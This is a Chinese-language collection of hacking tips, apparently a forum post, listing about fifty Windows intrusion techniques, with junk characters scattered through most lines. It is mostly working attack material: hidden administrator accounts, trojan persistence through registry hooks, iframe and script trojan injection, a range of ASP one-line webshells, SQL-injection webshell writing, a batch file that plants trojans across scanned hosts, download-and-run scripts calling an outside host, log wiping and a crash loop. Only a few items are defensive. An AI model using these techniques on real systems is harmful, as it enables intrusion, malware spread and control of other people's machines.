Xp系统修改权限防止病毒或木马等破坏系统,cmd下,: T" \! f) H( F# _* [4 o
cacls C:\windows\system32 /G hqw20:R
3 f/ ?; m8 Y' M2 |( o# Z, K6 Z7 n思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 z3 r; [' M# c% ~' g8 n
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; S) J6 f" _1 _1 g6 |1 ]2 v
* J3 U% O, P, Y
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, q. D0 @# k, D
% _6 D1 U$ e/ ~3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。" S/ _3 H/ \1 X% J; _; J
: Q! u0 z! Q& Q! ?4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号2 T& |) L& k1 h+ @/ x! x% q& K
. G% L T1 ]! u# S3 F( {) t5、利用INF文件来修改注册表" K. `# S* G! n& j d% C
[Version], d; S( g* ? w2 X/ D
Signature="$CHICAGO$"0 r/ v6 Q9 d2 Y
[Defaultinstall]
5 E7 K2 P* W4 \* B' L8 |addREG=Ating
! N& q7 F$ i# g! U# O1 K[Ating]
3 v- a% m* ]; E8 y3 S4 V3 A9 E7 P- y+ XHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, f( T1 ^& Z$ j- a% ], I/ k以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* Z( l0 B1 t0 m' Y3 q8 ?rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 {1 l+ |8 i8 m其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- ^: ^: y+ N$ \' VHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! Y! h9 _, h, G+ x$ q0 A
HKEY_CURRENT_CONFIG 简写为 HKCC8 v- {0 n1 L+ `" Z& m
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
1 Q% q: i, l0 w; n"1"这里代表是写入或删除注册表键值中的具体数据
, x) Z2 z! V& d+ d
$ Q4 K0 d+ C8 }6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,2 [. o3 {; E3 _3 ~* U* |4 o5 v
多了一步就是在防火墙里添加个端口,然后导出其键值
' d7 B( u4 f3 ?/ a; |8 _6 V, K[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]. N/ S7 U) Y6 ? U0 x5 \5 h8 b
# \- e$ G5 j7 q
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
" |9 w6 _( ?; L在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。: _6 Z! \9 x0 g* P
: I8 `& Q% w" m. V
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 ]) X0 S' e) L( z
! g4 v" H1 v Z/ k2 y- z" G- [
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 F' u! k \- H5 b0 d7 U可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。/ f- k, R! l+ {# |, @, Y
1 s2 s; M0 f' E6 |* R+ q( M3 [10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) U3 ]. E5 D4 I. \( Y& V
& u* t# _) P% d11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ f$ b; n9 u, F: P C8 Z- ^7 @用法:xsniff –pass –hide –log pass.txt
* M$ F) D" q2 N( m) c4 Y/ q
) x/ f1 B! o, x& _4 v0 h& m12、google搜索的艺术
. L+ i3 Z8 [7 `: p# v$ e搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”, }: l. a, P4 J2 U
或“字符串的语法错误”可以找到很多sql注入漏洞。& f$ ?# O5 O1 u, U4 |7 I
m# d+ m! z, h; \$ e6 B& E. [
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。( B" [+ ~- a3 n. Y1 K% d
, l' w- |- O( ~
14、cmd中输入 nc –vv –l –p 1987
! n, D- ]$ R3 k. g+ t5 q做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 _! z5 b* J. ~5 J" L: Y
# ~$ _4 J, h* z15、制作T++木马,先写个ating.hta文件,内容为# e; p; x( Z$ d) S; Q- r
<script language="VBScript">
* _' o: B/ U2 F7 W f4 u/ uset wshshell=createobject ("wscript.shell" )
$ F2 T- ?5 D! T9 pa=wshshell.run("你马的名称",1)* G* o! m) y! \, x
window.close4 M$ k( _- Y5 T: \
</script>
4 V& d) x+ C% Z再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
9 U; G/ x4 |2 {; N# I5 H
" B% i" ^3 c/ q/ V16、搜索栏里输入& B8 Z: ~4 B$ Y& v6 \( R
关键字%'and 1=1 and '%'='1 r2 e! t$ ~+ q6 F: J! B( C# D+ A2 G
关键字%'and 1=2 and '%'='
9 f4 | g. F# C* k }比较不同处 可以作为注入的特征字符
% [+ R; a( r; u2 \9 m7 g. C# ~; P9 N$ V
17、挂马代码<html>- D" f1 m- T5 J* U6 h7 j1 F2 q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& s, J3 X L! t8 c& ^
</html>
6 k; u; h- j* P( [* ]# u6 x% \. r3 F" _, z% J: \1 a
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 E8 D& B# X# dnet localgroup administrators还是可以看出Guest是管理员来。
* k! h; y1 @% Y9 G5 U2 \, o$ A( c0 r, J
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等1 u% h. ]# C: T6 g. s6 j
用法: 安装: instsrv.exe 服务名称 路径
! U* c7 y \) z# `2 q m6 K6 m卸载: instsrv.exe 服务名称 REMOVE
2 ]6 o: `# r3 ^+ o1 Q
' c7 \- C+ o2 s+ N2 {+ R1 g( T" _2 j! ?( T8 F
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 b/ r+ w+ X1 g8 y' r不能注入时要第一时间想到%5c暴库。
) R7 u! D7 E6 J' y R* h6 R6 t
* Z- {# ]/ u5 G6 V) D' a22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ r; X0 S+ ~' ~. L% ]$ m/ a# T
) {1 D \. _# l; Z23、缺少xp_cmdshell时
/ Z& m, I9 R) X尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'; f% j- x$ \$ G( i
假如恢复不成功,可以尝试直接加用户(针对开3389的)
6 D2 x% v+ B# A+ s0 o' Pdeclare @o int4 B: ]. _- X/ J' T
exec sp_oacreate 'wscript.shell',@o out
1 A4 a( ` h" s0 `+ C* @: y. oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员) x2 B! w2 l& `% Q' p
$ s( Q1 T: T3 ^. N; A/ R2 w3 u24.批量种植木马.bat
+ a, |. k+ J" P# [: `* G! A4 F4 p' gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中& v6 h" ?$ ~+ |. ~9 Z
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 K& [7 E/ W5 u$ i4 u扫描地址.txt里每个主机名一行 用\\开头* A; r! |4 H4 b# j# G+ o
6 ~% ?! x& C* N2 s# l* C! s25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
& P& z. |0 S8 z0 A: l/ A& a
1 v# W3 B1 [5 e: ~8 P4 o26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ N0 Q& m4 Q5 \7 H将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
3 p, r6 I6 U7 r( @0 x.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 g- u) V; O- x$ w8 _
9 w+ h& N6 e( y$ R5 G# W! n* S# i27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" }% S% s$ c: o! \" \7 M0 \2 G然后用#clear logg和#clear line vty *删除日志* d0 @" B8 L1 }3 F8 ~6 _
; z- t- x- l0 y# Y; U/ b28、电脑坏了省去重新安装系统的方法: f5 |4 G; D0 o1 |* V, H4 T8 ~; L
纯dos下执行,% {' \: a2 p$ C* W1 W" a
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config% N" z; Z6 v6 g4 h3 W3 e; K
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
: K6 Q0 g8 V& Y- l
# H, e5 p0 G2 n6 d% r" h29、解决TCP/IP筛选 在注册表里有三处,分别是:
" {6 D4 ?% h) JHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% o6 v) y/ X+ u$ K2 k- U( y5 N6 RHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 |8 l, e0 D0 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- m$ {1 J% ] A( P8 I- l
分别用" D' a; j+ I8 u& s: N4 u( O1 _
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! Y( t; a+ z$ ?4 b0 G; g# b; P
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip0 p, R% X# ^7 J. t
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& G& `) R- c( Q7 X/ `& @' p命令来导出注册表项# J% }# D+ R4 E/ _/ c5 S U8 [( W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
3 |) m0 }6 s( P i改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用2 `# _6 b% R5 R4 h+ r5 O
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。; c- N2 b6 o0 _# ]* n
# e- A6 D' m, w7 E30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U1 Z" F+ _1 t- n% R: ~9 x( r0 ~7 H' }: x
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3( C* i9 s* q& Z K
# O' S$ D" G- m5 T# @8 t1 W31、全手工打造开3389工具( O8 Y; j& w9 `
打开记事本,编辑内容如下:, ^: T5 b+ k* l6 K1 \; a
echo [Components] > c:\sql
8 t- u# Q0 J f2 }0 Secho TSEnable = on >> c:\sql5 ^( w4 o# @9 m; Y% a
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
+ M7 I5 M( I0 J8 r编辑好后存为BAT文件,上传至肉鸡,执行
1 R/ t: ^7 @0 r* X+ K) G$ K# m) }
! d: z5 y+ }& x" F& u32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马+ X1 K/ Y1 j* p& V
3 |/ Q- a' D7 W* P+ ]/ ~33、让服务器重启
+ J. X/ Z9 ?7 u5 v+ j. L0 H: l写个bat死循环:
, I: s- j/ V7 o! X@echo off
* e- Q; M" c0 r0 {) R:loop1" m5 S) @- i* U2 ^ B$ ^- @' f
cls6 Q" o1 Q# B9 L" V
start cmd.exe
; T( p2 V5 c8 K4 O% Q, fgoto loop1& {, t1 d* `9 v9 O
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
, S+ z6 w; V% x3 T9 y7 r4 U) H5 ]# ^1 ^/ I# z/ I1 O# D* E
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,2 f) m. |& x+ b8 r8 j: D3 E6 O
@echo off4 H" j7 P+ T$ K
date /t >c:/3389.txt- j9 I1 ?7 s I9 Y: U* i
time /t >>c:/3389.txt6 n0 j( y+ C2 K' B9 U# I
attrib +s +h c:/3389.bat
2 B# ]1 N! O. B J" iattrib +s +h c:/3389.txt8 n O: q' F7 u; r* z0 s
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
# J# ^. d+ R1 L) O7 ~并保存为3389.bat) N! P6 b" g7 h5 @, c1 a
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
( h! n. H/ W1 T0 J; R
+ B& c0 h7 O0 {! `35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' N+ V0 ?, G) f# A) kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)6 f7 v, e3 H! y- H* p7 F7 D5 R, i
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
- Z, X: i8 u$ s. Q% ^- F" c/ V' o
4 y6 G! B$ L0 ?& h. w _9 q2 O36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件4 W, E% `: V. c' b! b6 c' n& o
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址+ ~) r" P) I* Y% Z4 p, F1 T
echo 你的FTP账号 >>c:\1.bat //输入账号
' S5 _! `' C$ I$ ~5 D Recho 你的FTP密码 >>c:\1.bat //输入密码" L6 {. L( e( H
echo bin >>c:\1.bat //登入
8 e9 H g2 y6 } hecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 [) o* ^$ I J$ |2 Vecho bye >>c:\1.bat //退出, M6 _# R& v* m
然后执行ftp -s:c:\1.bat即可
) e% |& `8 b# K& D' B8 J7 Q8 _' k, g D
37、修改注册表开3389两法$ u; ?9 a) C: _& y2 P) t
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表 C# M# n8 X$ O# d& g
echo Windows Registry Editor Version 5.00 >>3389.reg. I! c* A( C, `; c$ c. L2 r0 ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg0 ]% v& n7 Q$ s1 @2 }5 ]
echo "Enabled"="0" >>3389.reg
4 q# P0 f8 @9 p5 N2 [% a1 wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows9 X1 n3 s# N9 U$ ^
NT\CurrentVersion\Winlogon] >>3389.reg/ w* l1 p" T/ o# e* ?5 o
echo "ShutdownWithoutLogon"="0" >>3389.reg
. Z9 j& Q' [# Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
/ |4 u8 k' [ M. G>>3389.reg+ r6 M: Z8 a* C: O
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg- X7 k) ~' x- p0 k4 i. V- l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]* H, r# t" e* ^7 Y& P: r) ?
>>3389.reg1 E/ J2 S y1 I9 v9 D. d
echo "TSEnabled"=dword:00000001 >>3389.reg/ W2 r( ]) K" X }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
; {5 i B: `5 ~4 {- o/ {7 X0 Aecho "Start"=dword:00000002 >>3389.reg
2 Y. U+ r0 |; v) Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]. U) Y& a. [9 ?7 H" n9 l1 h
>>3389.reg; Y; K4 L3 [8 N) ]) r& n# [9 r
echo "Start"=dword:00000002 >>3389.reg) r* V# y- U8 h: z6 @' s. B
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg2 h* {5 i S- V
echo "Hotkey"="1" >>3389.reg1 s9 p( R j( y% h6 V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ M% N3 L v/ C6 y
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
' H F) N" y: m$ w6 y+ Xecho "PortNumber"=dword:00000D3D >>3389.reg
* M) [! k% y6 d) ~, ]! kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 O5 V3 i4 c3 A8 U0 ?' Y- B1 o
Server\WinStations\RDP-Tcp] >>3389.reg) a T0 d. G+ L8 ]; N: w+ W8 y+ Y
echo "PortNumber"=dword:00000D3D >>3389.reg
7 C6 `# S: a7 f( K8 t. L把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。. q0 x/ }1 ]$ Z% t g' X
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
3 C3 }$ f+ N# _& i O7 f3 C1 O/ w因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ A0 I) m9 C; k9 B(2)winxp和win2003终端开启1 Z2 n- h! z1 R% l T
用以下ECHO代码写一个REG文件:
. O& Q' \9 P# Zecho Windows Registry Editor Version 5.00>>3389.reg4 @4 B& F4 |" X1 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. {" t$ y! D0 @5 a7 t) r1 SServer]>>3389.reg+ z, o) \* ]0 i* a( Y* I5 E& E2 Z
echo "fDenyTSConnections"=dword:00000000>>3389.reg) j) D3 O4 e% `& |5 D# C6 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 `+ d! N. d( m: k6 _: ?1 y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg: i$ E0 G5 W# a5 a) q
echo "PortNumber"=dword:00000d3d>>3389.reg
$ C' D O' H* L, Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal B* h: B( u2 r7 G+ r# M; ^
Server\WinStations\RDP-Tcp]>>3389.reg
E: h) ^: ` Y" ]echo "PortNumber"=dword:00000d3d>>3389.reg4 W7 ? p. R# x" }) f
然后regedit /s 3389.reg del 3389.reg8 T* h+ v. k& y& Q
XP下不论开终端还是改终端端口都不需重启
' T& b0 J% w- d1 m
& ]9 Y( k* N j38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) c0 G5 ?" }0 Q用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'; ?1 {- [2 g# |* J$ V, z5 ^! n
/ ^1 M1 l$ v4 T/ {39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!) E9 K" r3 X4 R. Q: F
(1)数据库文件名应复杂并要有特殊字符
' g) q6 ?, K& F* s(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; f0 |; U ~; c# I
将conn.asp文档中的
5 p9 H# j6 |" g" H C& {( O# h: P2 ?DBPath = Server.MapPath("数据库.mdb")
, ~" m' |" g1 o3 c% x3 vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath2 u/ h# P2 j( }! \
: N( b- Z2 W0 g8 e: ]% A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
! `2 w' K6 H8 r7 y( `(3)不放在WEB目录里$ _0 l) @; ~/ j
e2 C- h5 y6 K9 S0 }1 c9 a40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉: W$ N: w% Q8 g+ d7 r
可以写两个bat文件/ x4 E0 B: H5 z; e+ A
@echo off# w; B+ P* f9 _" B9 k
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
/ P9 ~3 C! L: N+ v$ A@del c:\winnt\system32\query.exe6 C- v. f; E l! z7 q
@del %SYSTEMROOT%\system32\dllcache\query.exe
: k* J ^' Y% Y/ y$ Y@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的# A0 i' U8 W3 h9 \, s
/ g0 o! ~' y# U2 A. K; R
@echo off% [4 C. `' o3 L; u
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
5 M) e! {+ [; c( m N* v@del c:\winnt\system32\tsadmin.exe
8 O3 t$ d$ D, V( W@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 w/ k! T' M2 {
A' V2 ?: F3 H- t41、映射对方盘符 h; @1 H; V7 I& ^
telnet到他的机器上,
3 _! h1 L8 ]6 ?$ [0 k/ s3 fnet share 查看有没有默认共享 如果没有,那么就接着运行# E& _ q0 D7 n, F2 j1 T0 O+ d8 F: g
net share c$=c:
4 C$ k# E8 H( nnet share现在有c$
% \' N3 e6 H# a/ K0 K/ ?! k在自己的机器上运行
. `/ y' G2 }, j: X& @net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
0 W$ L# D5 V; r, c
c! w4 O* k1 m' B+ t; e- B42、一些很有用的老知识
4 L$ a3 T# R% ~type c:\boot.ini ( 查看系统版本 )5 F& J& _. O$ z2 B5 j6 s/ F
net start (查看已经启动的服务)# ~6 w6 o4 Q- ~
query user ( 查看当前终端连接 )- i& y& a9 H& \4 Z2 j8 F
net user ( 查看当前用户 )5 U; [# E& J- l3 Z* Q
net user 用户 密码/add ( 建立账号 )
- p8 g0 q( F l5 E6 Hnet localgroup administrators 用户 /add (提升某用户为管理员)( Y* J. {5 F# K) \8 T, }7 Y1 G
ipconfig -all ( 查看IP什么的 )
% f, T3 ^5 A5 Ynetstat -an ( 查看当前网络状态 )
2 n) b. z u7 }+ P# s* cfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
% u3 r$ r. R, A. }5 H1 h6 Q克隆时Administrator对应1F4
0 R5 U3 ?$ p: J9 c! g6 Mguest对应1F53 b1 P: ^5 X" L6 N+ J8 o2 j! g B6 H
tsinternetuser对应3E8
6 P; B% b0 s9 a3 i' o$ k- U) W1 }0 ?
8 f N B( j" M9 ^2 K* D! o! G43、如果对方没开3389,但是装了Remote Administrator Service; u8 Q/ T( Q7 X5 j0 P
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
! @6 z, h3 }! B$ l解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 [' p0 W3 W" T' \! U
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin") E5 m* x0 a; \
" Q& D) x: ^% v! W l
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定): D T" H5 Q% \- ~# D+ U/ F/ f2 C
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 W- _2 F: c: X9 F3 n. s4 u; c! t2 M
( }9 e- r% @ t% j45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入) m6 u& w7 r2 g3 ]/ a% Y8 Q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open0 U. R h4 O. s# R6 @* J4 p
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =% x' ~. Y! Y1 U1 c0 C6 H0 h
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 G+ l, G( F3 t5 L2 t6 t% {1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
* k7 b9 ^5 _( ?3 O2 U; G$ X) H(这是完整的一句话,其中没有换行符)
8 U# b: f0 e/ ]& L; Q/ J然后下载:, ], t' s! H: u8 ^
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
, Y% \; X( q* @9 K( {) \
8 D E! E- ~5 L2 |; g46、一句话木马成功依赖于两个条件:
1 T# b) z" o3 g1、服务端没有禁止adodb.Stream或FSO组件
- [ ?( R# K8 y; f% \8 C2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。5 r! M0 J4 ~' n% W& p6 x' [+ ] R
4 F* `$ ^- {- i& n0 G" d/ S3 H47、利用DB_OWNER权限进行手工备份一句话木马的代码:
3 d( x( s7 @( h" P4 S G: S0 g+ t;alter database utsz set RECOVERY FULL--3 n( ~: L7 r7 O* V8 {
;create table cmd (a image)--
+ D3 p8 i+ M, F. t( `7 K" D0 O;backup log utsz to disk = 'D:\cmd' with init--
; U! W* b4 i% M;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--: b7 }" M; ]( Q" P f5 |/ l
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" e+ R J8 o& z
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。9 ]" h' `0 j9 k |$ E
0 |- K- E: ^: F# I3 d+ R' @8 i48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:" n, W8 y! o% A7 q
# I1 Z3 B6 V: a9 T7 G, d+ B- E用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
- q; n2 Y; c5 `* ?) s. \5 H所有会话用 'all'。
# ^! [6 o7 D( a, U0 x* ]-s sessionid 列出会话的信息。
9 _$ _+ ?2 Y7 b-k sessionid 终止会话。
" r4 M" o) _! Q* |-m sessionid 发送消息到会话。% K% r& z) J, z' Z
. p) o$ G5 I% J( uconfig 配置 telnet 服务器参数。1 Q8 r; K* B8 u* W9 Q+ F
' ^) u8 x$ r! C, J9 k5 W
common_options 为:
; S7 ?# X* O- B5 W5 q3 G-u user 指定要使用其凭据的用户( v& {8 k+ s3 g5 ^0 S
-p password 用户密码8 S, N; m2 Q6 U( M: b- C2 F
8 A# E/ Y; E" K* |7 \7 S/ B7 I
config_options 为:
* t' a1 d3 `1 b) L9 z6 I% sdom = domain 设定用户的默认域
0 c4 b5 ^9 ^( _% z& N9 H6 K2 Wctrlakeymap = yes|no 设定 ALT 键的映射* L0 I$ d6 k+ [- G# [ C
timeout = hh:mm:ss 设定空闲会话超时值
) s! @* D( W2 c0 X; E0 ptimeoutactive = yes|no 启用空闲会话。
+ j5 G$ B& N. W3 T; W; E$ c7 ]maxfail = attempts 设定断开前失败的登录企图数。
: T0 w. u4 l5 qmaxconn = connections 设定最大连接数。
7 ~/ N3 H$ @2 z7 M. \port = number 设定 telnet 端口。: P4 a4 V- X1 S6 ?/ f3 e
sec = [+/-]NTLM [+/-]passwd
0 ?: p* O4 ~- c: g设定身份验证机构3 k& B1 P2 t% N
fname = file 指定审计文件名。* v# C) F. c3 Z' K) m
fsize = size 指定审计文件的最大尺寸(MB)。, i# s+ S- |# }
mode = console|stream 指定操作模式。
4 y) c; U$ Q( j$ Q+ yauditlocation = eventlog|file|both
2 m' j8 ^* r* ^2 G) F2 p' B, ]- R指定记录地点
) v4 \, x" L! d& Taudit = [+/-]user [+/-]fail [+/-]admin
, i3 [0 ~5 w1 |* w! n% m8 q) g4 B# \+ L q1 `! D
49、例如:在IE上访问:% r8 `" k. M! Y: K# e1 L
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
; F( j/ G8 x; |' X; e! _% Uhack.txt里面的代码是:
% A& j/ W) p; C8 h. K<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: h6 v: K3 U% P( S4 T
把这个hack.txt发到你空间就可以了!1 `0 Q) `3 y1 e6 }
这个可以利用来做网马哦!
, |0 E% L+ b. w0 Z4 x/ d' m0 q8 A0 r
2 K9 M* Z6 K6 ^9 l50、autorun的病毒可以通过手动限制!
7 @/ k1 }" n2 l1 L+ _* [3 I, d1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!% |3 |5 E4 K# A5 C0 O2 {2 [
2,打开盘符用右键打开!切忌双击盘符~
7 n$ ~5 S* X' ?3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
; }( d, D2 `/ c4 O1 E
9 v9 x7 }! S( X s51、log备份时的一句话木马:, d* t3 p$ J* C6 M/ T$ m O
a).<%%25Execute(request("go"))%%25>
& j% r& z/ M" C& Cb).<%Execute(request("go"))%>, c- p }$ s' f
c).%><%execute request("go")%><%. [2 i( s1 N ~$ A$ X, j
d).<script language=VBScript runat=server>execute request("sb")</Script>. {: ~! W( p+ R! @
e).<%25Execute(request("l"))%25>7 x. h- t) x4 ^
f).<%if request("cmd")<>"" then execute request("pass")%>
$ e9 n8 E0 o/ x. I9 Q$ I% O) T7 F. M w7 X; @
52、at "12:17" /interactive cmd& M+ {$ T9 J; T" ]& ?% q- s
执行后可以用AT命令查看新加的任务
, ~6 W+ ?8 e% n( s9 Q2 Y7 ~9 f用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
( N* {+ m! {' w3 p: A* V3 O# b% I; H; \
